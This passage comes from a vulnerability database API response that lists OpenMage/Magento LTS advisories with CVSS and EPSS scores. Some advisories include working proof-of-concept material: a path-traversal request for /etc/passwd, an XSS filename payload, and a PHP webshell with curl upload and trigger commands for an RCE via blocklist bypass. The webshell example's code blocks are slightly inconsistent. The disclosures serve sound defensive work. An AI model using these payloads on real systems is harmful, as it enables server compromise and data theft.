|\n| Availability (A) | None | No impact on availability |\n\n## Affected Products\n\n- OpenMage LTS versions < 20.16.1\n- All versions derived from Magento 1.x with these code paths\n\n## Affected Files\n\n| File | Line | Vulnerable Code |\n| ------------------------------------------------------------ | ---- | ---------------------------------------- |\n| `app/code/core/Mage/Dataflow/Model/Convert/Parser/Csv.php` | 67 | `str_replace('../', '', urldecode(...))` |\n| `app/code/core/Mage/Dataflow/Model/Convert/Parser/Xml/Excel.php` | 63 | `str_replace('../', '', urldecode(...))` |\n\n## Vulnerability Details\n\nThe Dataflow module allows administrators to import data from files. The `files` parameter specifies which file to import from the `var/import/` directory. To prevent path traversal, the code uses `str_replace()` to remove `../` sequences:\n\n```php\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . str_replace('../', '', urldecode(Mage::app()->getRequest()->getParam('files')));\n```\n\nHowever, `str_replace()` only performs a single pass, making it trivially bypassable:\n\n### Bypass Examples\n\n| Input | After `str_replace('../', '', ...)` | Result |\n| ------------------------------ | ----------------------------------- | --------- |\n| `..././` | `../` | Bypass |\n| `....//` | `../` | Bypass |\n| `..././..././..././etc/passwd` | `../../../etc/passwd` | File read |\n\n### Attack Scenario\n\n1. Attacker gains admin access (via compromised credentials, social engineering, etc.)\n2. Navigate to System > Import/Export > Dataflow Profiles\n3. Create or modify an import profile\n4. Set the `files` parameter to: `..././..././..././etc/passwd`\n5. Run the profile to read the contents of `/etc/passwd`\n\n### Proof of Concept\n\n```\n# Request to Dataflow with bypass pattern\nGET /admin/system_convert_gui/run/id/1/?files=..././..././..././etc/passwd\n\n# The str_replace removes '../' leaving:\n# ..././..././..././etc/passwd -> ../../../etc/passwd\n\n# Final path resolves to:\n# /var/www/html/var/import/../../../etc/passwd -> /etc/passwd\n```\n\n## Remediation\n\nReplace the weak `str_replace()` filter with `basename()` to extract only the filename:\n\n```php\n// Before (vulnerable)\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . str_replace('../', '', urldecode(Mage::app()->getRequest()->getParam('files')));\n\n// After (fixed)\n$file = Mage::app()->getConfig()->getTempVarDir() . '/import/'\n . basename(urldecode(Mage::app()->getRequest()->getParam('files')));\n```\n\nUsing `basename()` ensures only the filename portion is used, completely preventing any path traversal regardless of the input pattern.\n\n## Workarounds\n\nIf immediate upgrade is not possible:\n\n1. **Restrict admin access**: Limit Dataflow access to trusted administrators only\n2. **Disable Dataflow**: If not in use, disable the Dataflow module entirely\n3. **Web Application Firewall**: Block requests containing path traversal patterns\n4. **File permissions**: Ensure the web server user has minimal filesystem permissions\n5. **Monitor admin activity**: Alert on suspicious Dataflow profile execution\n\n## Impact\n\nAn attacker with admin access can read sensitive files including:\n\n- `/etc/passwd` - System user information\n- `app/etc/local.xml` - Database credentials\n- `.env` files - Environment secrets\n- Log files - Potentially sensitive application data\n- Configuration files - Server and application configuration\n\n## Credit\n\nThis vulnerability was discovered and responsibly disclosed by [blackhat2013](https://hackerone.com/blackhat2013) through HackerOne.\n\n## Timeline\n\n- **2025-12-31**: Vulnerability reported via HackerOne\n- **2026-01-21**: Fix developed and tested", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25525", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21007", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21071", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21115", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00068", "scoring_system": "epss", "scoring_elements": "0.21128", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25525" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/5445", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/5445" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-6vqf-6fhm-7rc6", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:27:13Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-6vqf-6fhm-7rc6" }, { "reference_url": "https://hackerone.com/reports/3482926", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://hackerone.com/reports/3482926" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25525", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25525" }, { "reference_url": "https://github.com/advisories/GHSA-6vqf-6fhm-7rc6", "reference_id": "GHSA-6vqf-6fhm-7rc6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6vqf-6fhm-7rc6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-25525", "GHSA-6vqf-6fhm-7rc6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cbms-5g8f-wyg6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47140?format=api", "vulnerability_id": "VCID-dg5g-wnuf-ryad", "summary": "Magento LTS vulnerable to stored XSS in admin file form\n### Summary\nOpenMage is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields.\n\n### Details\n`Mage_Adminhtml_Block_System_Config_Form_Field_File` does not escape filename value in certain situations.\nSame as: https://nvd.nist.gov/vuln/detail/CVE-2024-20717\n\n### PoC\n1. Create empty file with this filename: `<img src=x onerror=alert(1)>.crt`\n2. Go to _System_ > _Configuration_ > _Sales | Payment Methonds_.\n3. Click **Configure** on _PayPal Express Checkout_.\n4. Choose **API Certificate** from dropdown _API Authentication Methods_.\n5. Choose the XSS-file and click **Save Config**.\n6. Profit, alerts \"1\" -> XSS.\n7. Reload, alerts \"1\" -> Stored XSS.\n\n### Impact\nAffects admins that have access to any fileupload field in admin in core or custom implementations.\nMalicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", "references": [ { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20717", "reference_id": "CVE-2024-20717", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20717" }, { "reference_url": "https://github.com/advisories/GHSA-gp6m-fq6h-cjcx", "reference_id": "GHSA-gp6m-fq6h-cjcx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gp6m-fq6h-cjcx" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-gp6m-fq6h-cjcx", "reference_id": "GHSA-gp6m-fq6h-cjcx", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-gp6m-fq6h-cjcx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69177?format=api", "purl": "pkg:composer/openmage/magento-lts@20.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.5.0" } ], "aliases": [ "GHSA-gp6m-fq6h-cjcx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dg5g-wnuf-ryad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44322?format=api", "vulnerability_id": "VCID-dj3k-4q1f-xfbh", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41144", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69783", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69811", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69831", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00598", "scoring_system": "epss", "scoring_elements": "0.69822", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41144" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/06c45940ba3256cdfc9feea12a3c0ca56d23acf8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/06c45940ba3256cdfc9feea12a3c0ca56d23acf8" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41144", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41144" }, { "reference_url": "https://github.com/advisories/GHSA-5j2g-3ph4-rgvm", "reference_id": "GHSA-5j2g-3ph4-rgvm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5j2g-3ph4-rgvm" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5j2g-3ph4-rgvm", "reference_id": "GHSA-5j2g-3ph4-rgvm", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:18Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5j2g-3ph4-rgvm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41144", "GHSA-5j2g-3ph4-rgvm", "GMS-2023-154" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dj3k-4q1f-xfbh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89723?format=api", "vulnerability_id": "VCID-fken-twwj-gkaq", "summary": "OpenMage LTS: Customer File Upload Extension Blocklist Bypass → Remote Code Execution\nThe product custom option file upload in OpenMage LTS uses an incomplete blocklist (`forbidden_extensions = php,exe`) to prevent dangerous file uploads. This blocklist can be trivially bypassed by using alternative PHP-executable extensions such as `.phtml`, `.phar`, `.php3`, `.php4`, `.php5`, `.php7`, and `.pht`. Files are stored in the publicly accessible `media/custom_options/quote/` directory, which lacks server-side execution restrictions for some configurations, enabling Remote Code Execution if this directory is not explicitly denied script execution.\n\n## Affected Version\n\n- **Project:** OpenMage/magento-lts\n- **Vulnerable File:** `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php`\n- **Vulnerable Lines:** 230-237 (`_validateUploadedFile()`)\n- **Configuration:** `app/code/core/Mage/Catalog/etc/config.xml:824`\n\n## Root Cause\n\nThe file upload handler uses `Zend_File_Transfer_Adapter_Http` directly with `ExcludeExtension` validator, referencing only:\n\n```xml\n<!-- Catalog/etc/config.xml:824 -->\n<forbidden_extensions>php,exe</forbidden_extensions>\n```\n\nThis misses the comprehensive `protected_extensions` blocklist defined elsewhere:\n\n```xml\n<!-- Core/etc/config.xml:449-478 -->\nphp, php3, php4, php5, php7, htaccess, jsp, pl, py, asp, sh, cgi, \nhtm, html, pht, phtml, shtml\n```\n\n## Vulnerable Code\n\n```php\n// app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:230-237\n$_allowed = $this->_parseExtensionsString($option->getFileExtension());\nif ($_allowed !== null) {\n $upload->addValidator('Extension', false, $_allowed);\n} else {\n $_forbidden = $this->_parseExtensionsString($this->getConfigData('forbidden_extensions'));\n if ($_forbidden !== null) {\n $upload->addValidator('ExcludeExtension', false, $_forbidden); // Only blocks php,exe!\n }\n}\n```\n\n## Steps to Reproduce\n\n### 1. Environment Setup\n\nTarget: OpenMage LTS with Apache+mod_php or Apache+PHP-FPM (with .phtml handler)\n\n### 2. Exploitation\n\n\n```bash\n# Upload .phtml (bypasses blocklist)\ncurl -X POST \"https://target.com/vulnerable_upload.php\" \\\n -F \"file=@shell.phtml;filename=shell.phtml\"\n```\n\n**Result:** \n<img width=\"1563\" height=\"733\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c56d43e8-364a-4402-8198-9f49a50fd691\" />\n\n### 3. Code Execution\n\nOpenMage derives the uploaded file's storage path deterministically from two values the attacker\nalready controls:\n\n**Subdirectory** — `getDispretionPath($filename)` takes the **first two characters** of the\nuploaded filename and uses them as nested directory names:\n\n```\nfilename = \"shell.phtml\" → s/ h/ → media/custom_options/quote/s/h/\n```\n\n**Filename** — `md5(file_get_contents($tmp_name))` is computed over the **raw bytes of the\nuploaded payload** (`File.php:245`):\n\n```php\n// app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:245\n$fileHash = md5(file_get_contents($fileInfo['tmp_name']));\n$filePath = $dispersion . DS . $fileHash . '.' . $extension;\n```\n\nBecause the attacker writes the webshell themselves, both the filename prefix and file contents are\nknown **before the upload request is sent**. The full URL can be pre-computed:\n\n```bash\nSHELL_CONTENT='<?php echo exec(\"id\"); system($_GET[\"cmd\"]??\"id\"); ?>\\n'\nHASH=$(echo -n \"$SHELL_CONTENT\" | md5sum | cut -d' ' -f1)\nPREFIX=$(echo \"shell\" | cut -c1-2 | sed 's/./&\\//g' | tr -d '\\n' | sed 's/\\/$//') # → s/h\n\n```bash\ncurl \"https://target.com/media/custom_options/quote/d9/bb4d647f16d9e7edfe49216140de2879.phtml\"\n```\n\n**Result:** RCE Confirmed\n\n<img width=\"1559\" height=\"827\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12990f06-8750-48e6-87c5-add18b9e7260\" />\n\n## Affected Deployments\n\n| Configuration | Status |\n|---------------|--------|\n| Apache + mod_php (with `php_flag engine 0`) | SAFE |\n| Apache + PHP-FPM | **VULNERABLE** |\n| Nginx (reference hardened config) | SAFE |\n| Nginx (generic config with .phtml→FPM) | **VULNERABLE** |\n\n## Impact\n\n1. **Remote Code Execution:** Full server compromise through webshell upload\n2. **Data Exfiltration:** Access to database credentials, customer PII, payment data\n3. **Lateral Movement:** Pivot to internal infrastructure\n4. **Supply Chain:** Inject malicious code into served content", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40488", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25511", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25406", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25465", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25524", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40488" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3j5q-7q7h-2hhv", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:14Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3j5q-7q7h-2hhv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40488", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40488" }, { "reference_url": "https://github.com/advisories/GHSA-3j5q-7q7h-2hhv", "reference_id": "GHSA-3j5q-7q7h-2hhv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3j5q-7q7h-2hhv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-40488", "GHSA-3j5q-7q7h-2hhv" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fken-twwj-gkaq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44306?format=api", "vulnerability_id": "VCID-g75g-ab3s-y7db", "summary": "Cross-Site Request Forgery (CSRF) in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21395", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25278", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25154", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25211", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25182", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25261", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21395" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://hackerone.com/reports/1086752", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://hackerone.com/reports/1086752" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21395", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21395" }, { "reference_url": "https://packagist.org/packages/openmage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://packagist.org/packages/openmage/magento-lts" }, { "reference_url": "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4", "reference_id": "GHSA-r3c9-9j5q-pwv4", "reference_type": 